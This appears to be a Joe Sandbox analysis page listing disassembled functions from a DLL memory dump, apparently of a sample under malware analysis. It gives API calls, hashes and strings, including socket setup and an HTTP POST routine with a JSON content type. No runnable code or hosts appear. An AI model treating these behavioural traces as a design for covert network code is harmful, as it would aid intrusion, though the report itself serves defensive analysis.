Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: __time64$htonl$H_prologTime$FileSleepSystem__aulldiv
String ID: AB..$@#$$%DD55612
API String ID: 3909542465-162139447
Opcode ID: 88d53e2ed8d932ee8e7c752f3a83666ed4040fa625f0a4c98bf1419b720cc872
Instruction ID: 83ad2a1a872cda3a6c476d4eeebbf5946a8b2fcab89cd1d972a97bb11b76fb41
Opcode Fuzzy Hash: 88d53e2ed8d932ee8e7c752f3a83666ed4040fa625f0a4c98bf1419b720cc872
Instruction Fuzzy Hash: 06318D759002059FEB48DF68D5C2BA93BA0FF48395F1001ADEC095F68BDBB4E980DB91

Function 10004B5B Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 357COMMONLIBRARYCODE

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 10004CA2
__aulldvrm.LIBCMT ref: 10004E41
__aulldvrm.LIBCMT ref: 10004EE0

Strings

d, xrefs: 10004BD5

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: __aulldvrm
String ID: d
API String ID: 1302938615-2564639436
Opcode ID: 43dd99d6499eca87f4c34a592e4b2ef59d4af46c3ac280a267a94a91c613a426
Instruction ID: d266b9f985afb6db8acc13a87a0ad374d087afdeaf5e68828122a97f1d7468d8
Opcode Fuzzy Hash: 43dd99d6499eca87f4c34a592e4b2ef59d4af46c3ac280a267a94a91c613a426
Instruction Fuzzy Hash: 98E13E78E096D69EE706CF2D84900ADBF72EB65240F19C1ABC5D547322CB349622CFA5

Function 1004AB3D Relevance: 6.2, APIs: 4, Instructions: 173COMMON

Download Yara Rule

APIs

Part of subcall function 100416EE: __getptd_noexit.LIBCMT ref: 100416EF
Part of subcall function 100416EE: __amsg_exit.LIBCMT ref: 100416FC

GetLocaleInfoW.KERNEL32(00000000,?,?,000000F0), ref: 1004AB96
GetLocaleInfoW.KERNEL32(00000000,?,?,000000F0), ref: 1004ABE3
GetLocaleInfoW.KERNEL32(00000000,?,?,000000F0), ref: 1004AC93

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: InfoLocale$__amsg_exit__getptd_noexit
String ID:
API String ID: 41668988-0
Opcode ID: 0bb00a8d9a6c8373d35bbb6a96b6db8a7a8b432b6151698ed0b66f5c6f2bd6b4
Instruction ID: 0511ab0e65edaa7b9d0950634dd4ee18afcfe313f168562f7f8ec9952b3de98a
Opcode Fuzzy Hash: 0bb00a8d9a6c8373d35bbb6a96b6db8a7a8b432b6151698ed0b66f5c6f2bd6b4
Instruction Fuzzy Hash: BC51AF759002179FEB19CF25CC82BAA77E8EF06351F3080B9E901CA585EB74ED90DB58

Function 10006376 Relevance: 6.1, APIs: 4, Instructions: 149sleepCOMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 1000648C
Sleep.KERNEL32(1005AFD8,?,00000000,00000000), ref: 100064C4
__time64.LIBCMT ref: 100064CB
__time64.LIBCMT ref: 10006498

Part of subcall function 1001B9CF: __EH_prolog.LIBCMT ref: 1001B9D4
Part of subcall function 1001B9CF: LocalAlloc.KERNEL32(00000040,?,1005D658,?,00000000,00000000,?,00000000,00000000), ref: 1001BA16
Part of subcall function 1001B9CF: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,?,?,00000000,00000000), ref: 1001BA35
Part of subcall function 1001B9CF: char_traits.LIBCPMT ref: 1001BA3C
Part of subcall function 1001B9CF: LocalFree.KERNEL32(00000000,00000000,00000000,?,000000FF,00000000,?,?,00000000,00000000), ref: 1001BA4C

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: __time64$Local$AllocByteCharFreeH_prologMultiSleepWidechar_traits
String ID:
API String ID: 1349466670-0
Opcode ID: 2cfedc5b6727c162afb21c75015c32cc16b9b3a06868d89c3dec54bdad2cfbfb
Instruction ID: 7cf599d640d092ba8d81afc26d70626d69daa3c1e3df8c3c9f01c42eb59162d8
Opcode Fuzzy Hash: 2cfedc5b6727c162afb21c75015c32cc16b9b3a06868d89c3dec54bdad2cfbfb
Instruction Fuzzy Hash: E851B374208741AFE724DF24CC95A9AB7E5FF85390F504A2DF09946196DB30B948CB62

Function 10015AF6 Relevance: 6.1, APIs: 4, Instructions: 60COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 10015B2A

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 5d4c7d71a43ffbc65026255f10c8dbbe89a6762bbb9170d467f0eec00a2ceade
Instruction ID: 52a0c41bfd207efae2051e98832a2de0653818bc3ca2d12135f47a2fcbf34020
Opcode Fuzzy Hash: 5d4c7d71a43ffbc65026255f10c8dbbe89a6762bbb9170d467f0eec00a2ceade
Instruction Fuzzy Hash: 0E1167B5908A02EFE341CF66D8C465AB7A4FF04316B15453EE40A8BA42C7B5F8E1CBD0

Function 1000FD2D Relevance: 4.5, APIs: 3, Instructions: 40sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 1000E8B3: __time64.LIBCMT ref: 1000E8B8
Part of subcall function 1000E8B3: _rand.LIBCMT ref: 1000E8C5

__time64.LIBCMT ref: 1000FD3A

Part of subcall function 10034410: GetSystemTimeAsFileTime.KERNEL32(?,00000007,00000007,?,10007696,00000000,1005ADE8,?), ref: 10034419
Part of subcall function 10034410: __aulldiv.LIBCMT ref: 10034439

Sleep.KERNEL32(00000000), ref: 1000FD41
__time64.LIBCMT ref: 1000FD49

Part of subcall function 10015977: socket.WS2_32(00000002,00000002,00000011), ref: 10015987
Part of subcall function 10015977: WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,1000FD6E,00000000), ref: 10015996

Part of subcall function 10015F50: __EH_prolog.LIBCMT ref: 10015F55

Part of subcall function 1001E093: CreateThread.KERNELBASE(00000000,00000000,1001C9A2,?,00000000,00000000), ref: 1001E0C3

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: __time64$Time$CreateErrorFileH_prologLastSleepSystemThread__aulldiv_randsocket
String ID:
API String ID: 633608075-0
Opcode ID: d30bed877b3eb11f29e50bc7e7300872d3162e6fabe178ceca34301d4a846610
Instruction ID: 35e5114acfa28dfccaa75df531074f78d3d40b230bfa8580435eee44eb89e0c1
Opcode Fuzzy Hash: d30bed877b3eb11f29e50bc7e7300872d3162e6fabe178ceca34301d4a846610
Instruction Fuzzy Hash: AB016D3AA002009BEB06DF64D896B993350EF44315F040079E9055F1CBDFB5A9918BD5

Function 10026330 Relevance: 4.5, APIs: 3, Instructions: 34networkCOMMON

Download Yara Rule

APIs

bind.WS2_32(?,00000000,00000010), ref: 10026357
InterlockedIncrement.KERNEL32(1016AB00), ref: 1002636E
InterlockedIncrement.KERNEL32(1016AB00), ref: 1002637D

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: IncrementInterlocked$bind
String ID:
API String ID: 3786334496-0
Opcode ID: 94adce06318814bd4522cea5ae5fc3188a8e10390c8465523d5d10866b9f62d9
Instruction ID: cae9bc99e758d100439ed7dae87e6c8f9df862dd16c75337faaf3fda47366c04
Opcode Fuzzy Hash: 94adce06318814bd4522cea5ae5fc3188a8e10390c8465523d5d10866b9f62d9
Instruction Fuzzy Hash: 6EF0A032300109BBE310CF6AFC84A69B7A9EB88771F908236F405C21D0D765DDA0EA69

Function 1004AA3D Relevance: 3.0, APIs: 2, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 100416EE: __getptd_noexit.LIBCMT ref: 100416EF
Part of subcall function 100416EE: __amsg_exit.LIBCMT ref: 100416FC

_GetPrimaryLen.LIBCMT ref: 1004AA88
EnumSystemLocalesW.KERNEL32(1004AB3D,00000001,000000A0,?,?,1004B05B,00000000,?,?,?,?,?,00000055), ref: 1004AA98

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: EnumLocalesPrimarySystem__amsg_exit__getptd_noexit
String ID:
API String ID: 3487593440-0
Opcode ID: 70a532fc47c7d692866dcf51e4e51e09fad5cd5e34bb1bb8c71259a40cc486ad
Instruction ID: e4f5bf762e8bed9ecc96679d54a5a3165a8cb5c09cd1d724635148da98d84293
Opcode Fuzzy Hash: 70a532fc47c7d692866dcf51e4e51e09fad5cd5e34bb1bb8c71259a40cc486ad
Instruction Fuzzy Hash: 7F01F7329503069FE720DF74C505BA5B7E1EF02351F304A39E559C6481D774B4A0CB55

Function 1004AF05 Relevance: 3.0, APIs: 2, Instructions: 40COMMON

Download Yara Rule

APIs

Part of subcall function 100416EE: __getptd_noexit.LIBCMT ref: 100416EF
Part of subcall function 100416EE: __amsg_exit.LIBCMT ref: 100416FC

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,1004ADDE,00000000,00000000,?), ref: 1004AF2F
_GetPrimaryLen.LIBCMT ref: 1004AF4E

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: InfoLocalePrimary__amsg_exit__getptd_noexit
String ID:
API String ID: 2554324226-0
Opcode ID: 44e3f6268d0e3cca7410006feda8c8aca15b844b97b17775b9935bfca78b25e7
Instruction ID: 3dd6440eadb722f76f0369bf2d9dd3b9ea9534e0bdb3ccb9691e06d8b38164c1
Opcode Fuzzy Hash: 44e3f6268d0e3cca7410006feda8c8aca15b844b97b17775b9935bfca78b25e7
Instruction Fuzzy Hash: A2F02B72B10211BBEF54D7B0CC41BD97798DB01290F218135E905E2081EA30FE8186A4

Function 1004AABA Relevance: 3.0, APIs: 2, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 100416EE: __getptd_noexit.LIBCMT ref: 100416EF
Part of subcall function 100416EE: __amsg_exit.LIBCMT ref: 100416FC

_GetPrimaryLen.LIBCMT ref: 1004AAEC
EnumSystemLocalesW.KERNEL32(1004AD30,00000001,?,?,1004B025,100443E2,?,?,00000055,?,?,100443E2,?,?,?), ref: 1004AAFF

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: EnumLocalesPrimarySystem__amsg_exit__getptd_noexit
String ID:
API String ID: 3487593440-0
Opcode ID: b507115a12aede8afc50f6795c79fd542520108237a0ab1eec08c1fd64176629
Instruction ID: 90c69a740598df8a7c97daa28306f4296dc0cc8195bcd8a038c9ae0d12bfce9b
Opcode Fuzzy Hash: b507115a12aede8afc50f6795c79fd542520108237a0ab1eec08c1fd64176629
Instruction Fuzzy Hash: 1FF0A031A50305AEEB21DB34EC01F963BD5DB032A1F218835F859CA592DB716C808AA9

Function 1004AD30 Relevance: 1.6, APIs: 1, Instructions: 81COMMON

Download Yara Rule

APIs

Part of subcall function 100416EE: __getptd_noexit.LIBCMT ref: 100416EF
Part of subcall function 100416EE: __amsg_exit.LIBCMT ref: 100416FC

GetLocaleInfoW.KERNEL32(00000000,?,?,000000F0), ref: 1004AD89

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: InfoLocale__amsg_exit__getptd_noexit
String ID:
API String ID: 3113341244-0
Opcode ID: fe672935b31e10ec36b9e58a5ce42d01419b777e97ef84b42b5b017214f70699
Instruction ID: ba8ac100b159e6eb14fcaca4a8efd505697d17c03d6c91541e12f7df10b91ca0
Opcode Fuzzy Hash: fe672935b31e10ec36b9e58a5ce42d01419b777e97ef84b42b5b017214f70699
Instruction Fuzzy Hash: 1621C575A10616AFDB14CF24CC41BAB73ECEF06351F214179E902CA481EB74ED84CB59

Function 1004A94F Relevance: 1.5, APIs: 1, Instructions: 42COMMON

Download Yara Rule

APIs

Part of subcall function 100416EE: __getptd_noexit.LIBCMT ref: 100416EF
Part of subcall function 100416EE: __amsg_exit.LIBCMT ref: 100416FC

GetLocaleInfoW.KERNEL32(00000000,?,?,000000F0,100443E9,00000000,10044509), ref: 1004A9A7

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: InfoLocale__amsg_exit__getptd_noexit
String ID:
API String ID: 3113341244-0
Opcode ID: 17b9c1de3b87ed76ff14aeacdcd79e2754f27964164271683bebc4ac99025428
Instruction ID: c04881ae7a749eb8032178861f7d396fdc4e4c5735778cfc6174256c7ee410bf
Opcode Fuzzy Hash: 17b9c1de3b87ed76ff14aeacdcd79e2754f27964164271683bebc4ac99025428
Instruction Fuzzy Hash: 7CF0F4367102159BD714DB74DC46ABA33ACEB09311F210178EA01D7182EA74AD0186A8

Function 1003B37D Relevance: 1.5, APIs: 1, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

EnumSystemLocalesW.KERNEL32(1003B369,00000001,?,1004A2D5,1004A373,00000003,00000000,?,?,00000000,00000000,00000000,00000000,00000000), ref: 1003B3AB

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: 7916741a0dea384a482a9694cffe1b462559c18c4e1ed8854d1e7d2a365d660f
Instruction ID: 5b5e60eb190fd5413a5b515707c804fded711c2c5a769b64abdf542a7218ae5c
Opcode Fuzzy Hash: 7916741a0dea384a482a9694cffe1b462559c18c4e1ed8854d1e7d2a365d660f
Instruction Fuzzy Hash: ACE0BF31154218EFEB11EFA5DC85B593BE6F704B15F404001F60C5F560D7F6A950DB54

Function 1003B3BA Relevance: 1.5, APIs: 1, Instructions: 18COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,00000000,00000002,?,?,1003D101,?,?,?,00000002,00000000,00000000,00000000), ref: 1003B3E1

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 8ca0de2b206cff19592fcb975ba2b51d35eb7dccc7f2f4bbe84270fb292c124e
Instruction ID: cab3a79e30e08c6fa743421f3241eba54f81d04790775e7bd8fade207c57906a
Opcode Fuzzy Hash: 8ca0de2b206cff19592fcb975ba2b51d35eb7dccc7f2f4bbe84270fb292c124e
Instruction Fuzzy Hash: D5D01736000119EFDF02EFE0EC458AA3BAAEB08215F408404FA084A420CBB2A9209B20

Function 1001B58B Relevance: .4, Instructions: 363COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5710a9a6f20bdab993f76e188229da93e40c0ebee1bc7497c7963f665c9584d0
Instruction ID: 1352b449084b7d7e229a125dfea1212924286c728adef9f82d66defa94ae34fe
Opcode Fuzzy Hash: 5710a9a6f20bdab993f76e188229da93e40c0ebee1bc7497c7963f665c9584d0
Instruction Fuzzy Hash: 3FE16A75E00A168FCB50CF99C880BA9BBF5EF48754F2640A9D945EB351E734ED81CB60

Function 10031B20 Relevance: 61.7, APIs: 33, Strings: 2, Instructions: 455networkCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(1005ADE8,00000000,00000000,00000000,00000000), ref: 10031B95
GetLastError.KERNEL32 ref: 10031BA9
_sprintf.LIBCMT ref: 10031BE2
InternetCloseHandle.WININET(00000000), ref: 10031C18
_memmove.LIBCMT ref: 10031C4B
InternetSetOptionA.WININET(00000000,00000006,?,00000004), ref: 10031C64
InternetConnectA.WININET(?,00000000,00000050,00000000,00000000,00000003,00000000,00000000), ref: 10031C86
GetLastError.KERNEL32 ref: 10031C97
_sprintf.LIBCMT ref: 10031CD0
InternetCloseHandle.WININET(?), ref: 10031D05
InternetCloseHandle.WININET(00000000), ref: 10031D09
_memmove.LIBCMT ref: 10031D38
InternetSetOptionA.WININET(00000000,00000006,?,00000004), ref: 10031D51
HttpOpenRequestA.WININET(?,POST,00000000,00000000,00000000,00000000,04000000,00000001), ref: 10031D78
GetLastError.KERNEL32 ref: 10031D89
_sprintf.LIBCMT ref: 10031DC2
InternetCloseHandle.WININET(?), ref: 10031DFD
InternetCloseHandle.WININET(?), ref: 10031E02
InternetCloseHandle.WININET(00000000), ref: 10031E06
_memmove.LIBCMT ref: 10031E35
HttpSendRequestA.WININET(?,?,?,?,?), ref: 10031E81
GetLastError.KERNEL32 ref: 10031E8F
_sprintf.LIBCMT ref: 10031ECE
InternetCloseHandle.WININET(?), ref: 10031F08
InternetCloseHandle.WININET(?), ref: 10031F0D

Strings

POST, xrefs: 10031D70
Content-Type: application/json;charset=UTF-8, xrefs: 10031E4A

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
